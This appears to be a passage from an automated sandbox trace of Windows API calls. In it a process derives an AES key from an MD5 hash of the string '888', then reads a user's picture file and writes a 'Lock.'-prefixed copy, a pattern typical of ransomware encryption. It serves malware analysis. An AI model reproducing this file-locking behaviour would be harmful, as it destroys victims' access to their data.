[0210.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab278, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.263] CryptCreateHash (in: hProv=0xa7c440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bf8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.263] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ca8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab410, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.264] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71d38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab248, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.265] CryptDeriveKey (in: hProv=0xa7c440, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0210.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.265] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.265] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.265] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.265] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.265] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0210.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/H4_H0S0fmbzOF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\h4_h0s0fmbzof.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.267] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.267] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73ea8 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.268] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ea8 | out: hHeap=0x2af0000) returned 1 [0210.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0210.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.H4_H0S0fmbzOF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.h4_h0s0fmbzof.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0210.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0210.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ee020 [0210.277] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.277] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0210.280] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x5e09, lpOverlapped=0x0) returned 1 [0210.280] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15e09) returned 0x2aae878 [0210.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ee020 | out: hHeap=0x2af0000) returned 1 [0210.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15e09) returned 0x2ac4690 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, 